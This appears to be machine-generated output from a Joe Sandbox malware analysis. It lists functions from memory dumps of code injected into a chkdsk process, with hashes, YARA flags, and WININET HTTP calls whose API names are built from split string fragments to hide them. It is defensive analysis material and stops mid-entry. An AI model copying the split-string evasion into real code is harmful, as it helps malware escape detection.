APIs

NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00702D11,00002000,00003000,00000004), ref: 0071A569

Memory Dump Source

Source File: 00000020.00000002.5716637360.0000000000700000.00000040.80000000.00040000.00000000.sdmp, Offset: 00700000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_700000_chkdsk.jbxd

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: e57ba96850fc4ed672a04358294dd965eebdd847be518c4c813339f9ff47fae7
Instruction ID: 84c2297b29f938c878f93db438b043a59ebd6fc82dccc6dcc00ee13f1f98cc45
Opcode Fuzzy Hash: e57ba96850fc4ed672a04358294dd965eebdd847be518c4c813339f9ff47fae7
Instruction Fuzzy Hash: 8EF08CB6110149ABCB14DF98DC85CE777ACFF88214B148649FD5D97202C234E855CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 050234E0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 050234EA

Memory Dump Source

Source File: 00000020.00000002.5733014309.0000000004FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FB0000, based on PE: true

Associated: 00000020.00000002.5736621977.00000000050D9000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.5736756118.00000000050DD000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4fb0000_chkdsk.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 3f66fd8d8142063a8daa58214bde34563e98a932502c9e10cb9bb02ee2cb685e
Instruction ID: 4a948792a931aeb854a83efda2ba4c2ed25da7737102f0c6a309e84cc3c2b2d5
Opcode Fuzzy Hash: 3f66fd8d8142063a8daa58214bde34563e98a932502c9e10cb9bb02ee2cb685e
Instruction Fuzzy Hash: 7390023160610402D6006258965570A10198BD1201FA1C855B0414568DC7A5895175A2

Uniqueness

Uniqueness Score: -1.00%

Function 05022D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 05022D1A

Memory Dump Source

Source File: 00000020.00000002.5733014309.0000000004FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FB0000, based on PE: true

Associated: 00000020.00000002.5736621977.00000000050D9000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.5736756118.00000000050DD000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4fb0000_chkdsk.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 8b765442c86ddfd0fecdf9a75f07ca2e92428e4fa6994c811248636f808d3a99
Instruction ID: fc73739b426b0bd0364f363e8bcb18a798e2efe2ea696bae313ed36e3dde076b
Opcode Fuzzy Hash: 8b765442c86ddfd0fecdf9a75f07ca2e92428e4fa6994c811248636f808d3a99
Instruction Fuzzy Hash: D690023120200413D6116258964570B001D8BD1241FD1C856B0414558DD6668952B121

Uniqueness

Uniqueness Score: -1.00%

Function 05022DC0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 05022DCA

Memory Dump Source

Source File: 00000020.00000002.5733014309.0000000004FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FB0000, based on PE: true

Associated: 00000020.00000002.5736621977.00000000050D9000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.5736756118.00000000050DD000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4fb0000_chkdsk.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: dc22cded12e6998bdead144e405044c682d62a9161f4b0182265bf0bbc439dc8
Instruction ID: cdd1613037f63917af193570c9450012fbdaa8f879bb9d8139fb6c60648adec1
Opcode Fuzzy Hash: dc22cded12e6998bdead144e405044c682d62a9161f4b0182265bf0bbc439dc8
Instruction Fuzzy Hash: A790027120200402D6407258954574A00198BD1301F91C455B5054554EC6698DD57665

Uniqueness

Uniqueness Score: -1.00%

Function 05022C20 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 05022C2A

Memory Dump Source

Source File: 00000020.00000002.5733014309.0000000004FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FB0000, based on PE: true

Associated: 00000020.00000002.5736621977.00000000050D9000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.5736756118.00000000050DD000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4fb0000_chkdsk.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 55b03e0af673711687349fc12316c6e1bcd1f70d49caa1cff172941301bfe39e
Instruction ID: 8bfa3ea66659f44e62b1d920561d70d3bd5449f705e93ae3f098f39a8a4b3813
Opcode Fuzzy Hash: 55b03e0af673711687349fc12316c6e1bcd1f70d49caa1cff172941301bfe39e
Instruction Fuzzy Hash: 3090022120604442D6006658A549A0A00198BD1205F91D455B1054595DC6358851B131

Uniqueness

Uniqueness Score: -1.00%

Function 05022C30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 05022C3A

Memory Dump Source

Source File: 00000020.00000002.5733014309.0000000004FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FB0000, based on PE: true

Associated: 00000020.00000002.5736621977.00000000050D9000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.5736756118.00000000050DD000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4fb0000_chkdsk.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 4031cb997b9a042adc6016f4df1913c39674f81205845690969cdf441482bfb9
Instruction ID: b036bd18ef63bbcef9520a6a89528fcfa7be79c0b71aaf5b46d717ffe5c5b7a8
Opcode Fuzzy Hash: 4031cb997b9a042adc6016f4df1913c39674f81205845690969cdf441482bfb9
Instruction Fuzzy Hash: A690022921300002D6807258A54960E00198BD2202FD1D859B0005558CC92588696321

Uniqueness

Uniqueness Score: -1.00%

Function 05022CF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 05022CFA

Memory Dump Source

Source File: 00000020.00000002.5733014309.0000000004FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FB0000, based on PE: true

Associated: 00000020.00000002.5736621977.00000000050D9000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.5736756118.00000000050DD000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4fb0000_chkdsk.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: dd5d50783a87f4239f540abe1e5c2094178be5e7c4e6ac1f00895c7d02310c3e
Instruction ID: 96f70da84d83f24c05aae652a025c2b80728f043de3924276452257b16985754
Opcode Fuzzy Hash: dd5d50783a87f4239f540abe1e5c2094178be5e7c4e6ac1f00895c7d02310c3e
Instruction Fuzzy Hash: 66900221243041529A45B258954550B401A9BE1241BD1C456B1404950CC5369856E621

Uniqueness

Uniqueness Score: -1.00%

Function 05022F00 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 05022F0A

Memory Dump Source

Source File: 00000020.00000002.5733014309.0000000004FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FB0000, based on PE: true

Associated: 00000020.00000002.5736621977.00000000050D9000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.5736756118.00000000050DD000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4fb0000_chkdsk.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 1112ae41633c8c0b7e52dbf49f189e34be886b5907322219555898f3c57dcacc
Instruction ID: f199dfb819b7270b9ecb9c8dfe46a81ca1985a8ba6c2fee1b1536abb1647f30e
Opcode Fuzzy Hash: 1112ae41633c8c0b7e52dbf49f189e34be886b5907322219555898f3c57dcacc
Instruction Fuzzy Hash: 0790022121280042D70066689D55B0B00198BD1303F91C559B0144554CC92588616521

Uniqueness

Uniqueness Score: -1.00%

Function 05022FB0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 05022FBA

Memory Dump Source

Source File: 00000020.00000002.5733014309.0000000004FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FB0000, based on PE: true

Associated: 00000020.00000002.5736621977.00000000050D9000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.5736756118.00000000050DD000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4fb0000_chkdsk.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 2950e6808f00dd9fdbf62a5e04c9dbf7454805ce20ce59342afd91bb8c690839
Instruction ID: 828045e852a8dfe35fc2710dc701942dc790a81274ebff9cdb99c4e9d5dee4d2
Opcode Fuzzy Hash: 2950e6808f00dd9fdbf62a5e04c9dbf7454805ce20ce59342afd91bb8c690839
Instruction Fuzzy Hash: 0C90022124200802D6407258D55570B001ACBD1601F91C455B0014554DC626896576B1

Uniqueness

Uniqueness Score: -1.00%

Function 05022E50 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 05022E5A

Memory Dump Source

Source File: 00000020.00000002.5733014309.0000000004FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FB0000, based on PE: true

Associated: 00000020.00000002.5736621977.00000000050D9000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.5736756118.00000000050DD000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4fb0000_chkdsk.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: b03b2f8dd41537f58d8c2c0c066ac9311acd5709fb78ae6febf7fc721aeb2f66
Instruction ID: b633af11110e8ee5bdff1d72805ecef08d581b37fee7193dc2a6ccd1a81e831a
Opcode Fuzzy Hash: b03b2f8dd41537f58d8c2c0c066ac9311acd5709fb78ae6febf7fc721aeb2f66
Instruction Fuzzy Hash: E390026134200442D60062589555B0A0019CBE2301F91C459F1054554DC629CC527126

Uniqueness

Uniqueness Score: -1.00%

Function 050229F0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 050229FA

Memory Dump Source

Source File: 00000020.00000002.5733014309.0000000004FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FB0000, based on PE: true

Associated: 00000020.00000002.5736621977.00000000050D9000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.5736756118.00000000050DD000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4fb0000_chkdsk.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: e4b1fcc76196873c192f51b4361373003430daee52f013ef4d488a8f4608cbfd
Instruction ID: 862ac68bcc606f529418a6d825f177ac8fec8bf54578bf8b70dba456b77023cf
Opcode Fuzzy Hash: e4b1fcc76196873c192f51b4361373003430daee52f013ef4d488a8f4608cbfd
Instruction Fuzzy Hash: 8D900225212000034605A658574550B005A8BD6351791C465F1005550CD63188616121

Uniqueness

Uniqueness Score: -1.00%

Function 05022B00 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 05022B0A

Memory Dump Source

Source File: 00000020.00000002.5733014309.0000000004FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FB0000, based on PE: true

Associated: 00000020.00000002.5736621977.00000000050D9000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.5736756118.00000000050DD000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4fb0000_chkdsk.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 48f3b80eff9fb4fc087f1036bd1288609fadf182db95138eaa5fc95c14c0f073
Instruction ID: b2219207af6922397dfd0316081ea94efc08707784d0e1cfc948dede3db31dc7
Opcode Fuzzy Hash: 48f3b80eff9fb4fc087f1036bd1288609fadf182db95138eaa5fc95c14c0f073
Instruction Fuzzy Hash: 4290023120604842D64072589545A4A00298BD1305F91C455B0054694DD6358D55B661

Uniqueness

Uniqueness Score: -1.00%

Function 05022B10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 05022B1A

Memory Dump Source

Source File: 00000020.00000002.5733014309.0000000004FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FB0000, based on PE: true

Associated: 00000020.00000002.5736621977.00000000050D9000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.5736756118.00000000050DD000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4fb0000_chkdsk.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 10d928da0433b581eef36dc334307c8ed018ffe0ec71fc56f2d3856dc41b4393
Instruction ID: 7f7acf2dab4ab6793829eeb6172ab7a8d453ea2cd386bef81d1061a47b41f024
Opcode Fuzzy Hash: 10d928da0433b581eef36dc334307c8ed018ffe0ec71fc56f2d3856dc41b4393
Instruction Fuzzy Hash: 8C90023120200802D6807258954564E00198BD2301FD1C459B0015654DCA258A5977A1

Uniqueness

Uniqueness Score: -1.00%

Function 05022B80 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 05022B8A

Memory Dump Source

Source File: 00000020.00000002.5733014309.0000000004FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FB0000, based on PE: true

Associated: 00000020.00000002.5736621977.00000000050D9000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.5736756118.00000000050DD000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4fb0000_chkdsk.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: aaacdd53b38ecf8dd638c9b9ed19d6e4f9069585c11ea2b9a4a5d7882b7c33c6
Instruction ID: 1a6b662c11ddc3321de2f689d5f780b5f353a05e80c573219da400d461313ee8
Opcode Fuzzy Hash: aaacdd53b38ecf8dd638c9b9ed19d6e4f9069585c11ea2b9a4a5d7882b7c33c6
Instruction Fuzzy Hash: DD90023120200842D60062589545B4A00198BE1301F91C45AB0114654DC625C8517521

Uniqueness

Uniqueness Score: -1.00%

Function 05022B90 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 05022B9A

Memory Dump Source

Source File: 00000020.00000002.5733014309.0000000004FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FB0000, based on PE: true

Associated: 00000020.00000002.5736621977.00000000050D9000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.5736756118.00000000050DD000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4fb0000_chkdsk.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: f685fbf0d6cf6ce804f124ef996382c563e78c4834937caac56506218783430a
Instruction ID: 8866b6ab84a859a04be437ac3cffa213f3b8dc1a45c63d2e8d90c21cb71f4741
Opcode Fuzzy Hash: f685fbf0d6cf6ce804f124ef996382c563e78c4834937caac56506218783430a
Instruction Fuzzy Hash: FE90023120208802D6106258D54574E00198BD1301F95C855B4414658DC6A588917121

Uniqueness

Uniqueness Score: -1.00%

Function 05022BC0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 05022BCA

Memory Dump Source

Source File: 00000020.00000002.5733014309.0000000004FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FB0000, based on PE: true

Associated: 00000020.00000002.5736621977.00000000050D9000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.5736756118.00000000050DD000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4fb0000_chkdsk.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 80687465580c4d4b3ae69e8f93ee861e2769dd736e52a72772c1a3145a95a518
Instruction ID: e0b0c8471da9b8a53c7152d4dc3b5ffbe4a397c0243e8c8935681c762a2892ef
Opcode Fuzzy Hash: 80687465580c4d4b3ae69e8f93ee861e2769dd736e52a72772c1a3145a95a518
Instruction Fuzzy Hash: C590023120200402D6006698A54964A00198BE1301F91D455B5014555EC67588917131

Uniqueness

Uniqueness Score: -1.00%

Function 05022A10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 05022A1A

Memory Dump Source

Source File: 00000020.00000002.5733014309.0000000004FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FB0000, based on PE: true

Associated: 00000020.00000002.5736621977.00000000050D9000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.5736756118.00000000050DD000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4fb0000_chkdsk.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: c4dc3d92a18c0d5c09ae2369497fa304c991ee772c431f51b1b22eee51c32163
Instruction ID: b3e734654dced1fbc5400f514a17af0d5f7f26d03eef8e4d4d4c3896e6bee680
Opcode Fuzzy Hash: c4dc3d92a18c0d5c09ae2369497fa304c991ee772c431f51b1b22eee51c32163
Instruction Fuzzy Hash: 07900225222000024645A658574550F04599BD73517D1C459F1406590CC63188656321

Uniqueness

Uniqueness Score: -1.00%

Function 05022A80 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 05022A8A

Memory Dump Source

Source File: 00000020.00000002.5733014309.0000000004FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FB0000, based on PE: true

Associated: 00000020.00000002.5736621977.00000000050D9000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.5736756118.00000000050DD000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4fb0000_chkdsk.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: eeb4da7832194340a9a5809848252cd5f695eeb50fcb340db3a81ed9b709a52a
Instruction ID: 2050a936c1aea0245cb3a7e3e0775bd77b8df1f7427c0422442197374ecec109
Opcode Fuzzy Hash: eeb4da7832194340a9a5809848252cd5f695eeb50fcb340db3a81ed9b709a52a
Instruction Fuzzy Hash: B49002612030000386057258955561A401E8BE1201F91C465F1004590DC53588917125

Uniqueness

Uniqueness Score: -1.00%

Function 05022AC0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 05022ACA

Memory Dump Source

Source File: 00000020.00000002.5733014309.0000000004FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FB0000, based on PE: true

Associated: 00000020.00000002.5736621977.00000000050D9000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.5736756118.00000000050DD000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4fb0000_chkdsk.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 273650f9df62c0a047b3e1619440f2b37d61cd680223e33b2af726acd4966947
Instruction ID: f3ab8b67e82ceb918a6857df6c9f5a6bda838585d9c3d39221565ed292514237
Opcode Fuzzy Hash: 273650f9df62c0a047b3e1619440f2b37d61cd680223e33b2af726acd4966947
Instruction Fuzzy Hash: 7390023160600802D6507258955574A00198BD1301F91C455B0014654DC7658A5576A1

Uniqueness

Uniqueness Score: -1.00%

Function 0071AA56 Relevance: 21.1, APIs: 1, Strings: 11, Instructions: 70
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InternetConnectA.WININET(ConnectA,rnetConnectA,InternetConnectA,00000000,?,?,?,?,?,?,?,00000000), ref: 0071AA48

Strings

InternetConnectA, xrefs: 0071AA3A, 0071AA45
RequestA, xrefs: 0071AAC2, 0071AAC7
OpenRequestA, xrefs: 0071AABE, 0071AAC6
ConnectA, xrefs: 0071AA42, 0071AA47
Http, xrefs: 0071AA7A
estA, xrefs: 0071AA8F
HttpOpenRequestA, xrefs: 0071AA6D, 0071AA70
Open, xrefs: 0071AA81
Requ, xrefs: 0071AA88
rnetConnectA, xrefs: 0071AA3E, 0071AA46
HttpOpenRequestA, xrefs: 0071AABA, 0071AAC5

Memory Dump Source

Source File: 00000020.00000002.5716637360.0000000000700000.00000040.80000000.00040000.00000000.sdmp, Offset: 00700000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_700000_chkdsk.jbxd

Yara matches

Similarity

API ID: ConnectInternet
String ID: ConnectA$Http$HttpOpenRequestA$HttpOpenRequestA$InternetConnectA$Open$OpenRequestA$Requ$RequestA$estA$rnetConnectA
API String ID: 3050416762-742942285
Opcode ID: 1f0301f85518b8fab2e6d97e5ba2cb9451bca8804ef07c850243888ff266128e
Instruction ID: 9e98452bafdf15f903bcb9f0787f9eb94a7e73220a864a4878c4e694856fa96c
Opcode Fuzzy Hash: 1f0301f85518b8fab2e6d97e5ba2cb9451bca8804ef07c850243888ff266128e
Instruction Fuzzy Hash: 262118B2A01118ABCB14DF88D981DEF7BB9EF4C310F058248FE09A7245D635ED11CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0071AAE0 Relevance: 15.8, APIs: 1, Strings: 8, Instructions: 42
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

HttpSendRequestA.WININET(RequestA,SendRequestA,HttpSendRequestA,00000000,?,?,?,?,00000000), ref: 0071AB3C

Strings

Send, xrefs: 0071AB01
estA, xrefs: 0071AB0F
HttpSendRequestA, xrefs: 0071AB2E, 0071AB39
RequestA, xrefs: 0071AB36, 0071AB3B
Http, xrefs: 0071AAFA
HttpSendRequestA, xrefs: 0071AAED, 0071AAF0
Requ, xrefs: 0071AB08
SendRequestA, xrefs: 0071AB32, 0071AB3A

Memory Dump Source

Source File: 00000020.00000002.5716637360.0000000000700000.00000040.80000000.00040000.00000000.sdmp, Offset: 00700000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_700000_chkdsk.jbxd

Yara matches

Similarity

API ID: HttpRequestSend
String ID: Http$HttpSendRequestA$HttpSendRequestA$Requ$RequestA$Send$SendRequestA$estA
API String ID: 360639707-2503632690
Opcode ID: 72bd04ccb80f99a9a95fe3f8999795ca87b41bb32edd1d4429e9ba5b49feee29
Instruction ID: 830ea9cfd6089b84cf2d59515ee7ffda9f60d1aa8315e30b014c5bae653b8fdb
Opcode Fuzzy Hash: 72bd04ccb80f99a9a95fe3f8999795ca87b41bb32edd1d4429e9ba5b49feee29
Instruction Fuzzy Hash: C7014FB2909118AFCB10DF98D845AEFBBB8EB48210F148189FD18A7204D670EE10CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 0071AADF Relevance: 15.8, APIs: 1, Strings: 8, Instructions: 37
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

HttpSendRequestA.WININET(RequestA,SendRequestA,HttpSendRequestA,00000000,?,?,?,?,00000000), ref: 0071AB3C

Strings

Send, xrefs: 0071AB01
estA, xrefs: 0071AB0F
HttpSendRequestA, xrefs: 0071AB2E, 0071AB39
RequestA, xrefs: 0071AB36, 0071AB3B
Http, xrefs: 0071AAFA
HttpSendRequestA, xrefs: 0071AAED, 0071AAF0
Requ, xrefs: 0071AB08
SendRequestA, xrefs: 0071AB32, 0071AB3A

Memory Dump Source

Source File: 00000020.00000002.5716637360.0000000000700000.00000040.80000000.00040000.00000000.sdmp, Offset: 00700000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_700000_chkdsk.jbxd

Yara matches

Similarity

API ID: HttpRequestSend
String ID: Http$HttpSendRequestA$HttpSendRequestA$Requ$RequestA$Send$SendRequestA$estA
API String ID: 360639707-2503632690
Opcode ID: 93aee55b8101cc4732935c67bd7b8e612b85e3202fb9025c7d5219e4b4836ffd
Instruction ID: c3416268f4612b21ae1dfad84457e78ec62f7db5de5cb32c81b87904d585a86c
Opcode Fuzzy Hash: 93aee55b8101cc4732935c67bd7b8e612b85e3202fb9025c7d5219e4b4836ffd
Instruction Fuzzy Hash: FB011DB2909159AFCB14DF98C845EEFBBB8EF58210F158188FD196B205D2709A10CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 0071A9E0 Relevance: 14.0, APIs: 1, Strings: 7, Instructions: 48
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InternetConnectA.WININET(ConnectA,rnetConnectA,InternetConnectA,00000000,?,?,?,?,?,?,?,00000000), ref: 0071AA48

Strings

Inte, xrefs: 0071A9FA
InternetConnectA, xrefs: 0071AA3A, 0071AA45
ConnectA, xrefs: 0071AA42, 0071AA47
Conn, xrefs: 0071AA08
ectA, xrefs: 0071AA0F
rnet, xrefs: 0071AA01
rnetConnectA, xrefs: 0071AA3E, 0071AA46

Memory Dump Source

Source File: 00000020.00000002.5716637360.0000000000700000.00000040.80000000.00040000.00000000.sdmp, Offset: 00700000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_700000_chkdsk.jbxd

Yara matches

Similarity

API ID: ConnectInternet
String ID: Conn$ConnectA$Inte$InternetConnectA$ectA$rnet$rnetConnectA
API String ID: 3050416762-1024195942
Opcode ID: adccd6fb8208d3c98e30e6bf2d4e9020a6f59a09b06b882a48730a827695da45
Instruction ID: 4c34df7133e0917ab1d90a6a71b20c50a81986ce6e51130585028bfd9c0a294a
Opcode Fuzzy Hash: adccd6fb8208d3c98e30e6bf2d4e9020a6f59a09b06b882a48730a827695da45
Instruction Fuzzy Hash: B001E9B2905118AFCB14DF98D941EEF77B8EB48310F158289FE08A7241D630EE10CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 0071A9D5 Relevance: 14.0, APIs: 1, Strings: 7, Instructions: 45networkCOMMON

Download Yara Rule

APIs

InternetConnectA.WININET(ConnectA,rnetConnectA,InternetConnectA,00000000,?,?,?,?,?,?,?,00000000), ref: 0071AA48

Strings

Inte, xrefs: 0071A9FA
InternetConnectA, xrefs: 0071AA3A, 0071AA45
ConnectA, xrefs: 0071AA42, 0071AA47
Conn, xrefs: 0071AA08
ectA, xrefs: 0071AA0F
rnet, xrefs: 0071AA01
rnetConnectA, xrefs: 0071AA3E, 0071AA46

Memory Dump Source

Source File: 00000020.00000002.5716637360.0000000000700000.00000040.80000000.00040000.00000000.sdmp, Offset: 00700000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_700000_chkdsk.jbxd

Yara matches

Similarity

API ID: ConnectInternet
String ID: Conn$ConnectA$Inte$InternetConnectA$ectA$rnet$rnetConnectA
API String ID: 3050416762-1024195942
Opcode ID: 248a83c9de2de9eac69621bd6e7cb312fc27c2a0ecaf568815901da503fbcab6
Instruction ID: 5ce0fcc77103db5473897006e89d603d8c910c126b6cc900bc36a38325ddd960
Opcode Fuzzy Hash: 248a83c9de2de9eac69621bd6e7cb312fc27c2a0ecaf568815901da503fbcab6
Instruction Fuzzy Hash: CD010CB2915158AFCB14DF98D945EEF7BB8EF4C310F158288FA09A7241D634EE11CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0071A970 Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 41networkCOMMON

Download Yara Rule

APIs

InternetOpenA.WININET(rnetOpenA,InternetOpenA,?,?,?), ref: 0071A9C7

Strings

Open, xrefs: 0071A998
rnet, xrefs: 0071A991
Inte, xrefs: 0071A98A
rnetOpenA, xrefs: 0071A9C1, 0071A9C6
A, xrefs: 0071A99F
InternetOpenA, xrefs: 0071A9BD, 0071A9C5

Memory Dump Source

Source File: 00000020.00000002.5716637360.0000000000700000.00000040.80000000.00040000.00000000.sdmp, Offset: 00700000, based on PE: false

Joe Sandbox IDA Plugin

